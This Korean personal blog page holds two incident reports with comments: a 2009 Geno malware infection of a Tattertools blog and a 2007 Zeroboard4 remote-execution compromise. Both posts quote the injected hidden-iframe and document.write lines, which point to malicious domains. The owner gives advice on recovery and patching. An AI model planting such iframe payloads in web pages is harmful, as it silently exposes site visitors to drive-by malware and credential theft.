'감염'에 해당되는 글 2건

  1. Jun 24, 2009 제노(Geno) 바이러스 감염 (8)
  2. Nov 01, 2007 나를 아주 놀래킨 http://d.xin8.info/daipi/css.htm (11)
June 24, 2009 13:12

제노(Geno) 바이러스 감염

그외 나머지


ggerzer.com 블로그(버전:tattertools-1.1.3-expansion) 먹통

■ 1차 발견 - 2009년 6월 18일 목요일

(1)
태터툴즈관련 plugins 폴더내 거의 모든 플러그인 각각의 index.php 에
<iframe src="에이치티티피클론슬러쉬슬러쉬 globalmixgroup.cn:8080/ts/in.cgi?pepsi64" width=125 height=125 style="visibility: hidden"></iframe> 및
<iframe src="에이치티티피클론슬러쉬슬러쉬 hugebestbuy.cn:8080/index.php" width=126 height=196 style="visibility: hidden"></iframe> 의 내용이 심어져 있었음.

(2)
태터툴즈관련 blog/owner 폴더 위주로 index.php와 main.php에 위와같이 감염.

(3)
그외 홈페이지 계정내 몇몇 폴더의 index.php/htm/html, main.php/htm/html 파일도 감염.


■ 2차 발견 - 2009년 6월 23일 화요일 오후

1차 발견때와 동일한 폴더 및 파일들이 재감염.
단, 도메인이 namegamestore.cn:8080/index.php 와 shopfilmexistence.cn:8080/index.php 로 변경.



현재(2009.06.24)
감염 이전의 파일들로 모두 복구한 상태이나, 언제 또다시 감염될지 모르겠음..



제노 바이러스는 2009년 5월 22일자 뉴스에서부터 검색이 되고 있다. 검색으로 알아본 결과;;
제노(Geno) 바이러스는 일본의 컴퓨터 판매 사이트인 제노라는 업체 홈페이지가 지난 4월 해킹을 당해 이 악성코드가 전파되면서 알려졌으며, 만일 PC 사용자가 이 악성코드에 감염된 숙주 사이트에 접근할 경우, PC에 어도비(Adobe) 아크로뱃(Acrobat)이나 플래시(Flash) 취약점을 통해 PC가 제노 바이러스에 감염됩니다. 이 악성코드에 감염된 PC는 사용자가 FTP 로그인을 하면 계정정보가 유출될 수 있으며 특정 웹사이트로 강제 이동시키는 증상도 나타납니다. 또 일부 백신 소프트웨어 실행이 중지되고 해당 백신 소프트웨어 사이트의 접속이 차단돼 더 큰 피해를 가져올 수 있습니다.

나의 경우, (언제 어디서 어떻게 감염됐는지는 모르겠지만) 제노 악성코드에 감염된 내 PC 에서,
내 홈페이지 계정으로 FTP 로그인을 시도한적이 있기때문에, 나의 FTP 로그인 정보를 빼내어 홈페이지 파일을 강제 수정하여 iframe 자바스크립트 코드를 삽입한 것으로 추정됨..

한동안 FTP 접속할 일이 거의 없었는데,, 공교롭게도 6월18일 romeo1052님의 질문글에 답변하기 위해서 다이어리스킨 소스를 살펴보려고 잠시 FTP 접속했었다는것!!!
그렇다고해서 뭐 속좁게 romeo1052님을 원망한다거나 증오한다거나 그러진 않는다는것을 밝히고 싶다.

TAG romeo1052, 감염, 바이러스, 악성코드, 해킹
Related Entries
Posted by 최우선 at June 24, 2009 13:12

"그외 나머지" 카테고리의 다른 글 입니다.

No Trackback 8 Comments
#    그외 나머지   

Trackback URL for this entry ::
http://ggerzer.com/trackback/424

Write a comment

  1. 저랑 아이디가 좀 비슷한 그 romeo1052라는 사람때문에 고생좀 하셨군요
    혼내주시라능

    Posted by romeo1053 at June 24, 2009 21:32 # Edit/Del Reply

    • 이게 다 romeo1052님 탓이다..라고 생각하지 않아요.
      왜냐면, 전 그렇게 속 좁은 사람이 아니거등요..

      Posted by 최우선 at June 25, 2009 15:09 # Edit/Del Reply

  2. 이야... 멋지네요 -_-;;;
    아무튼 원상 복구 되셨으니 다행입니다.


    Posted by donit2 at June 25, 2009 07:35 # Edit/Del Reply

    • 1차 발견 당시에도 감염 이전의 파일들로 모두 복구했음에도 2차 감염이 또다시 발생된거거든요..
      그저께 빛자루 실행해서 싹싹 청소하다보니 뭔가 바이러스가 잡히긴 잡혔는데, 어제 2차 복구후 FTP접속 패스워드를 변경해두긴했는데,,, 3차 감염이 발생할지 안할지는 시간을 갖고 좀 더 지켜봐야할 것 같아요.

      Posted by 최우선 at June 25, 2009 15:14 # Edit/Del Reply

  3. 관리자님 보세요...
    광고성 리플을 삭제하려는데...
    352개가 달렸기에 모두선택하고 삭제하니 하나도 지워지지 않는군요...
    댓글 삭제 갯수 제한이 몇개까지 인지요?
    더 늘려주시면 안될까요?
    하나씩 지우려니 눈아프고, 손가락아프고, 시간아프고....???ㅋ

    Posted by 한바다 at August 23, 2009 18:31 # Edit/Del Reply

    • 댓글 삭제 갯수 제한은 없습니다.
      모두 선택하지 마시고,, 한 서너개만 선택 체크해서 삭제해보세요..
      삭제가 안된다면, 뭔가 스킨설치가 제대로 안된것같습니다..
      스킨의 설정페이지내 게시물관리의 댓글 일괄삭제 메뉴도 있습니다.

      Posted by 최우선 at August 27, 2009 16:15 # Edit/Del Reply

  4. 저도 이거 감염되었는데,,,ㅜㅜ어떻게 잡아야 하나요??
    8080이라는 숫자가 iframe안에 저도 모르는 사이에 들어갔더라구요,,,
    그래서 제 홈페이지 한동안 안되다가 호스팅업체에 전화해서 난리치다가 감염된 파일은 수정했는데,,,,백신이나 이거 잡을수 있는 바이러스 없나요?

    Posted by 저도,,,, at September 21, 2009 13:51 # Edit/Del Reply

    • 일단, 사용하고 계신 컴퓨터에 바이러스가 있는지 체크해서 치료하시고 나서,, 홈페이지 계정의 FTP 접속 비밀번호를 바꾸시는 방법밖에는...

      Posted by 최우선 at September 23, 2009 14:57 # Edit/Del Reply

 

November 1, 2007 18:42

나를 아주 놀래킨 http://d.xin8.info/daipi/css.htm

나름의 정보/제로보드4
d.xin8.info/daipi/css.htm  (☜ 주소창에 쳐보시면 절대 안됩니다.)

어찌나 놀라고 당황했던지, 홈페이지를 폐쇄해야 하는거 아닌가 고민했었습니다.
지금은 어느정도 진정된 가슴을 쓸어내리며,
오늘 제가 겪은 『제로보드4 원격 실행 보안 취약점』의 생생한 경험을 포스팅합니다.

d.xin8.info 에 관련된 검색결과를 여기저기 뒤져서 알게된 정보들 중 유용한 링크들을 열거해보았습니다.
정보를 제공해주신 모든분들께 진심으로 감사드립니다..(그대들이 없었으면 어쩔뻔했어;;)

참고링크 :

제로보드4 원격 실행 보안 취약점 패치 #2  - by zeroboard.com의 zero님 : 2007.11.07. 
제로보드4 원격 실행 보안 취약점 패치  - by zeroboard.com의 zero님 : 2007.11.01. 
[긴급보안]★MS XMLHTTP 4.0 Active X Control 원격 코드 실행, 제로데이 취약점  - by 쿨~~ 님 : 2007.10.30.
[제로보드4] http://d.xin8.info/daipi/css.htm 관련 주의  - by Parker Falcon 님 : 2007.10.30.
제로보드 및 제트오디오 사용자 보안관련사항  - by php스쿨의 신의삽님 : 2007.10.29.


대충 요약을 해보건데,
제로보드 회원가입시 사진파일 업로드를 통해서,(혹은 보안패치가 안된 하위버전의 write_ok.php 업로드를 통해서) 그리고 lib.php 파일을 거쳐서(?)
제로보드의 icon 폴더에 include.gif 혹은
제로보드의 images 폴더에 admin_info.gif 파일을 만들고,
이 파일들은 이미지 파일을 가장해서, 소스내에
document.write("<iframe width='0' height='0' src='http://d.xin8.info/daipi/css.htm'></iframe>");
를 심어놓습니다.
그리고 _head.php 최하단에 자바스크립트 실행문을 넣습니다.

말그대로 원격/실행/보안/취약점.


아래의 캡춰이미지는 제가 떨리는 가슴을 진정시키며, 침착하게 대응했던 내용입니다. -_-;
꺼져닷컴을 방문해주시는, 그리고 꺼져스킨을 사용해주신 분들중
저와같은 피해를 당하지 않으셨으면 하는 마음에 포스팅합니다.
(여러분! 회원가입폼에서 사진업로드를 당분간 막읍시다.)
사용자 삽입 이미지
TAG include.gif, xin8.info, 감염, 제로보드4보안, 중국발 크래킹
Related Entries
Posted by 최우선 at November 1, 2007 18:42

"제로보드4" 카테고리의 다른 글 입니다.

    1 Trackbacks 11 Comments
    #    나름의 정보/제로보드4   

    Trackback URL for this entry ::
    http://ggerzer.com/trackback/349

    1. Subject: 제로보드4 원격 실행 보안 취약점 패치

      Tracked from 상하이강낭콩밭 November 1, 2007 19:48  삭제

      중국발 크래킹이라니....<br /> 그래서 싸이가 열리질 않나 보다.<br /> 중국발은 모두 차단시켰나???!!!

    Write a comment

    1. 중국발이라.... 그럼 혹시... 점점 지능화되는 크래킹에 꺼져님같이 어느 정도 사람이 오는 홈피는 더 폐쇄적으로 되겠네요. 어딜 가나 사람 사귀기가 녹녹치 않은 세상이군요.

      Posted by 강낭콩 at November 1, 2007 20:44 # Edit/Del Reply

      • 크래킹과 무관하게,
        어제 오전, 순전히 제실수로 DB를 잘못건드리는 바람에 홈페이지가 엉망이 될뻔했는데, 다행히도 그전날밤에 백업해놓은 자료가 있어서 복구했답니다..
        휘유~~

        그래도 어찌되었든,,
        중국발 크래킹이 아직까지도 완전한 패치가 이뤄지지 않은듯합니다..
        이번 해킹은 사태가 심각한것 같아요. 제로님께서도 계속 고민중이신것 같던데,,,

        Posted by 최우선 at November 3, 2007 20:51 # Edit/Del Reply

    2. 안녕하세요. 댓글 잘 보았습니다.
      저도 제가 자주 가는 사이트에 변조 사건이 발생하여 제가 검색한 결과들을 정리해서 올려 놓았던 것 입니다. 의외로 여러곳에서 유사한 일이 발생하여 놀랬습니다만, 그런 분들에게 조금이라도 도움이라도 도움이 되었으면 좋겠습니다.
      댓글 달아주셔서 감사합니다. 이런 정보는 정확성만큼 신속성이 중요하니, 아무래도 여러 사람들이 편하게 볼 수 있는 것이 중요하다고 생각합니다.
      아무튼 더욱 많은 사람들에게 정보를 전하는데 도와주셔서 감사합니다 :)

      Posted by Parker Falcon at November 4, 2007 20:54 # Edit/Del Reply

      • Parker Falcon님 반가워요..
        이렇게 친히 방문해주셔서 기쁩니다.
        처음에는 문제의 gif 파일을 삭제하고, 해킹당한 _head.php 파일을 수정하고, zero님의 자료로 패치하면 간단하게 해결될거라고 생각했었는데,,
        제로보드 공식사이트에, 패치로도 속수무책이라는 댓글들과, 같은 웹호스팅 서비스를 받는 크래킹당한 다른 계정의 사용자를 통해서도 문제가 발생될 가능성이 있다는 제로님의 댓글을 보면 겁이나요.
        제 홈페이지는 그 이후로 문제가 없었던듯한데,, 언제 뚫릴지몰라 불안불안해요.

        Posted by 최우선 at November 5, 2007 13:48 # Edit/Del Reply

    3. 그러게 말입니다. 편리성 때문인지 뭔지는 잘 모르겠지만, 아무튼 우리나라 인터넷 게시판의 많은 부분을 차지하고 있는 zeroboard4의 보안상의 헛점이라는 점에서 좀 더 보안이 튼튼했으면 좋겠다는 생각이 드는군요. 아무튼 항상 보안에 신경써야될거같네요. 찾아와 주셔서 항상 감사합니다 :)

      Posted by Parker Falcon at November 5, 2007 19:20 # Edit/Del Reply

      • 저는 태터툴즈와 제로보드4를 이원화해서 홈페이지를 운영하고 있는데,,
        지금은 태터툴즈나 제로보드XE의 등장으로 인기가 시들해졌지만,, 제로보드4! 참 편리합니다. 게시판 관리와 회원관리가 웹초보에게도 어렵지 않고, 커뮤니티 형성에는 딱이죠. 그리고, 다양하고 예쁜 스킨들이 많이 공개되었기 때문에 선택의 폭이 넓다는게 제로보드4가 우리나라 인터넷 게시판의 많은 부분을 차지하고 있는 이유라고 생각됩니다.
        문제는, 이 커뮤니케이션이라는것 때문에 업로드와 HTML 사용권한이 낮춰지면서 악용될 소지가 있다는건데,,
        저역시 제로보드4의 스킨을 만드는 입장에서, 보안의 문제에 상당히 예민해지게 되네요..
        제로보드4에 안철수를 플러그인할 수 있음 좋겠네요..

        Posted by 최우선 at November 6, 2007 10:18 # Edit/Del Reply

      • 네...예쁜 스킨들이 많죠.보안에 그렇게 취약한 줄은 몰랐네요. 내용도 없는 일정에 조회수가 그렇게 많은 이유를 알았네요. 저는 상관없지만, 바쁜데 클릭하고 허탈해하실 분들을 위해 rss주소를 shcoloum으로 바꾸어 주세요. 요즘은 그 게시판에 글이 올라가네요.

        Posted by 강낭콩 at November 6, 2007 22:38 # Edit/Del Reply

      • 강낭콩님께서 상관없다면 그냥 두죠 뭐..
        RssPaper 에 보시다시피, shstudy 와 tosh 그리고 shinfo가 수집되고 있습니다.
        그런데 shcoloum은 읽기권한이 9이상인건 알고 계시나요?
        읽기권한이 없는 글은 rss수집이 무의미하다고나..

        Posted by 최우선 at November 7, 2007 08:31 # Edit/Del Reply

    4. 안녕하세요, 우선님~
      불이나게 달려왔습니다. 말씀해주신 내용들 후다닥 실행했습니다. 휴~~
      그, 그런데 말입니다.
      이 해킹을 당하면 구채적으로 홈에 무슨 영향을 받게 되는건지요?
      이를테면 자료가 날라간다든지...뭐 어떤 악영향에 대한 간단한 사항좀
      말씀해 주세요, 중요한 자료들은 올리지 않게요.
      현재는 아무도 못보는 게시판을 만들어서 거기에 올려두고 있거든요.
      이런 게시판도 해킹 당하는 건가요???

      Posted by sketch at November 6, 2007 15:45 # Edit/Del Reply

      • 게시판에 답댓글을 쓰고났는데, 페이지가 하얀상태로 멈춰있는거에요.
        소스를 보니, 자바스크립트 한줄이 덜렁.
        그래서 게시판을 새로 열어서 보았더니, d.xin8.info연결을 자꾸 시도하는거에요. 127.0.0.1 인가 뭔가로도 연결하려고 했구요.
        그리고 위에 첨부한 이미지와 같은 현상들이 있었습니다.

        악영향이요?
        sketch님께서 말씀하신것처럼 이를테면 자료가 다 날라간다던지,,의 시나리오도 충분히 예측할 수 있습니다.
        아무도 못보는 게시판이고 아니고를 떠나서, 제로보드 data폴더를 통째로 삭제하는것은 어렵지 않을것같아요..
        프로그램을 어떻게 짜느냐에 따라서 악영향은 무궁무진하다고 할 수 있겠죠. 어쨌든, 제 서버의 파일을 외부에서 임의로 수정했다는 그 자체가 굉장히 깨름직합니다.
        이번 사태는 실제적인 피해정도는 그다지 크지 않은듯하면서, 보안에 대해서 경각심을 일깨워준 교훈적인 사례같아요.(전적으로 제생각)

        그래서 저도 지금 꺼져스킨을 수정하고 있습니다.
        본문이나 댓글내에 script 나 iframe 등을 무효화하는 방향으로;

        Posted by 최우선 at November 7, 2007 09:14 # Edit/Del Reply

    5. 11월 7일자로 2차 패치가 발표되었네요..
      http://www.zeroboard.com/15978083

      Posted by 최우선 at November 10, 2007 09:20 # Edit/Del Reply

     

    1